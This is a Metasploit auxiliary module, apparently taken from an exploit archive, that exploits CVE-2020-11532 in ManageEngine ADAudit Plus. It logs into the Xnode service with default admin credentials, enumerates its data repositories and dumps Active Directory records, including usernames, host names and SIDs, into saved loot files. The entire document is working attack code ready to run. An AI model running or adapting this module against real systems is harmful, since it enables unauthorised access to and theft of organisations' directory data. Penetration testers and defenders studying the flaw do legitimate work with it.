## https://sploitus.com/exploit?id=PACKETSTORM:180693
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::ManageEngineXnode
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::Tcp
prepend Msf::Exploit::Remote::AutoCheck
def initialize(_info = {})
super(
'Name' => 'ManageEngine ADAudit Plus Xnode Enumeration',
'Description' => %q{
This module exploits default admin credentials for the DataEngine
Xnode server in ADAudit Plus versions prior to 6.0.3 (6032) in
order to dump the contents of Xnode data repositories (tables),
which may contain (a limited amount of) Active Directory
information including domain names, host names, usernames and SIDs.
This module can also be used against patched ADAudit Plus versions
if the correct credentials are provided.
By default, this module dumps only the data repositories and fields
(columns) specified in the configuration file (set via the
CONFIG_FILE option). The configuration file is also used to
add labels to the values sent by Xnode in response to a query.
It is also possible to use the DUMP_ALL option to obtain all data
in all known data repositories without specifying data field names.
However, note that when using the DUMP_ALL option, the data won't be labeled.
This module has been successfully tested against ManageEngine
ADAudit Plus 6.0.3 (6031) running on Windows Server 2012 R2 and
ADAudit Plus 6.0.7 (6076) running on Windows Server 2019.
},
'Author' => [
'Sahil Dhar', # discovery and PoC (for authentication only)
'Erik Wynter', # @wyntererik - additional research and Metasploit
],
'License' => MSF_LICENSE,
'References' => [
['CVE', '2020-11532'],
['PACKETSTORM', '157609'],
],
)
register_options [
OptString.new('CONFIG_FILE', [false, 'YAML file specifying the data repositories (tables) and fields (columns) to dump', File.join(Msf::Config.data_directory, 'exploits', 'manageengine_xnode', 'CVE-2020-11532', 'adaudit_plus_xnode_conf.yaml')]),
OptBool.new('DUMP_ALL', [false, 'Dump all data from the available data repositories (tables). If true, CONFIG_FILE will be ignored.', false]),
Opt::RPORT(29118)
]
end
def config_file
datastore['CONFIG_FILE'].to_s # in case it is nil
end
def dump_all
datastore['DUMP_ALL']
end
def username
datastore['USERNAME']
end
def password
datastore['PASSWORD']
end
def check
# create a socket
res_code, sock_or_msg = create_socket_for_xnode(rhost, rport)
if res_code == 1
return Exploit::CheckCode::Unknown(sock_or_msg)
end
@sock = sock_or_msg
# perform basic checks to see if Xnode is running and if so, if it is exploitable
res_code, res_msg = xnode_check(@sock, username, password)
case res_code
when 0
return Exploit::CheckCode::Appears(res_msg)
when 1
return Exploit::CheckCode::Safe(res_msg)
when 2
return Exploit::CheckCode::Unknown(res_msg)
else
return Exploit::CheckCode::Unknown('An unexpected error occurred whilst running this module. Please raise a bug ticket!')
end
end
def run
# check if we already have a socket, if not, create one
unless @sock
# create a socket
res_code, sock_or_msg = create_socket_for_xnode(rhost, rport)
if res_code == 1
fail_with(Failure::Unreachable, sock_or_msg)
end
@sock = sock_or_msg
end
# get the Xnode health status
health_warning_message = 'Received unexpected response while trying to obtain the Xnode "de_health" status. Enumeration may not work.'
res_code, res_health = get_response(@sock, action_admin_health, health_warning_message, 'de_health')
if res_code == 0
if res_health['response']['de_health'] == 'GREEN'
print_status('Obtained expected Xnode "de_health" status: "GREEN".')
else
print_warning("Obtained unexpected Xnode \"de_health\" status: \"#{res_health['response']['de_health']}\"")
end
end
# get the Xnode info
info_warning_message = 'Received unexpected response while trying to obtain the Xnode version and installation path via the "xnode_info" action. Enumeration may not work.'
res_code, res_info = get_response(@sock, action_xnode_info, info_warning_message)
if res_code == 0
if res_info['response'].keys.include?('xnode_version')
print_status("Target is running Xnode version: \"#{res_info['response']['xnode_version']}\".")
else
print_warning('Failed to obtain the Xnode version.')
end
if res_info['response'].keys.include?('xnode_installation_path')
print_status("Obtained Xnode installation path: \"#{res_info['response']['xnode_installation_path']}\".")
else
print_warning('Failed to obtain the Xnode installation path.')
end
end
# obtain the total number of records and the min and max record ID numbers for each repo, which is necessary to enumerate the records
repo_record_info_hash = {}
ad_audit_plus_data_repos.each do |repo|
# send a general query, which should return the "total_hits" parameter that represents the total record count
res_code, res = get_response(@sock, action_dr_search(repo))
total_hits = process_dr_search(res, res_code, repo, ['UNIQUE_ID'], 'total_hits')
# check if total_hits is nil, as that means process_dr_search failed and we should skip to the next repo
next if total_hits.nil?
total_hits = total_hits.first
# use "aggr" with the "min" specification for the UNIQUE_ID field in order to obtain the minimum value for this field, i.e. the oldest available record
aggr_min_query = { 'aggr' => { 'min' => { 'field' => 'UNIQUE_ID' } } }
res_code, res = get_response(@sock, action_dr_search(repo, ['UNIQUE_ID'], aggr_min_query))
aggr_min = process_dr_search(res, res_code, repo, ['UNIQUE_ID'], 'aggr_min')
# check if aggr_min is nil, as that means process_dr_search failed and we should skip to the next repo
next if aggr_min.nil?
aggr_min = aggr_min.first
# use "aggr" with the "max" specification for the UNIQUE_ID field in order to obtain the maximum value for this field, i.e. the most recent record
aggr_max_query = { 'aggr' => { 'max' => { 'field' => 'UNIQUE_ID' } } }
res_code, res = get_response(@sock, action_dr_search(repo, ['UNIQUE_ID'], aggr_max_query))
aggr_max = process_dr_search(res, res_code, repo, ['UNIQUE_ID'], 'aggr_max')
# check if aggr_max is nil, as that means process_dr_search failed and we should skip to the next repo
next if aggr_max.nil?
aggr_max = aggr_max.first
print_good("Data repository #{repo} contains #{total_hits} records with ID numbers between #{aggr_min} and #{aggr_max}.")
repo_record_info_hash[repo] = {
'total_hits' => total_hits.to_i,
'aggr_min' => aggr_min.to_i,
'aggr_max' => aggr_max.to_i
}
end
# check if we found any repositories that contained any data
if repo_record_info_hash.empty?
print_error('None of the repositories specified contained any data!')
return
end
if dump_all
data_to_dump = ad_audit_plus_data_repos
else
data_to_dump = grab_config(config_file)
case data_to_dump
when config_status::CONFIG_FILE_DOES_NOT_EXIST
fail_with(Failure::BadConfig, "Unable to obtain the Xnode data repositories to target from #{config_file} because this file does not exist. Please correct your 'CONFIG_FILE' setting or set 'DUMP_ALL' to true.")
when config_status::CANNOT_READ_CONFIG_FILE
fail_with(Failure::BadConfig, "Unable to read #{config_file}. Check if your 'CONFIG_FILE' setting is correct and make sure the file is readable and properly formatted.")
when config_status::DATA_TO_DUMP_EMPTY
fail_with(Failure::BadConfig, "The #{config_file} does not seem to contain any data repositories and fields to dump. Please fix your configuration or set 'DUMP_ALL' to true.")
when config_status::DATA_TO_DUMP_WRONG_FORMAT
fail_with(Failure::BadConfig, "Unable to obtain the Xnode data repositories to target from #{config_file}. The file doesn't appear to contain valid data. Check if your 'CONFIG_DIR' setting is correct or set 'DUMP_ALL' to true.")
end
end
# try and dump the database tables Xnode has access to
data_to_dump.each do |repo, fields|
if fields.blank? && !dump_all
print_error("Unable to obtain any fields for the data repository #{repo} to query. Skipping this table. Check your config file for this module if this is unintended behavior.")
next
end
# check if we actually found any records for the repo
next unless repo_record_info_hash.include?(repo)
total_hits = repo_record_info_hash[repo]['total_hits']
id_range_lower = repo_record_info_hash[repo]['aggr_min']
max_id = repo_record_info_hash[repo]['aggr_max']
if total_hits.nil? || id_range_lower.nil? || max_id.nil?
print_error("Unable to obtain the necessary fields for #{repo} from the repo_record_info_hash!")
next
end
if total_hits == 0
print_error("No hits found for #{repo}!")
next
end
id_range_upper = id_range_lower + 9
query_ct = 0
results = []
print_status("Attempting to request #{total_hits} records for data repository #{repo} between IDs #{id_range_lower} and #{max_id}. This could take a while...")
hit_upper_limit = false
until hit_upper_limit
# build a custom query for the unique_id range
custom_query = { 'query' => "UNIQUE_ID:[#{id_range_lower} TO #{id_range_upper}]" }
query = action_dr_search(repo, fields, custom_query)
res_code, res = get_response(@sock, query)
partial_results = process_dr_search(res, res_code, repo, fields)
results += partial_results unless partial_results.nil?
query_ct += 1
if query_ct % 5 == 0
print_status("Processed #{query_ct} queries (max 10 records per query) so far. The last queried record ID was #{id_range_upper}. The max ID is #{max_id}...")
end
# check if we have already queried the record with the maximum ID value, if so, we're done
if id_range_upper == max_id
hit_upper_limit = true
else
id_range_lower += 10
id_range_upper += 10
# make sure that id_range_upper never exceeds the maximum ID value
if id_range_upper > max_id
id_range_upper = max_id
end
end
end
if results.empty?
print_error("No non-empty records were obtained for #{repo}.")
next
end
# shorten the data repository name (if necessary) so that it can be used as part of the eventual output file name
outfile_part = "xnode_#{repo.gsub('Adap', '').gsub('AuditLog', 'audit').gsub('ADReplication', 'ADRepl').downcase}"
path = store_loot(outfile_part, 'application/json', rhost, results.to_json, "#{repo}.json")
print_good("Saving #{results.length} records from the #{repo} data repository to #{path}")
end
end
end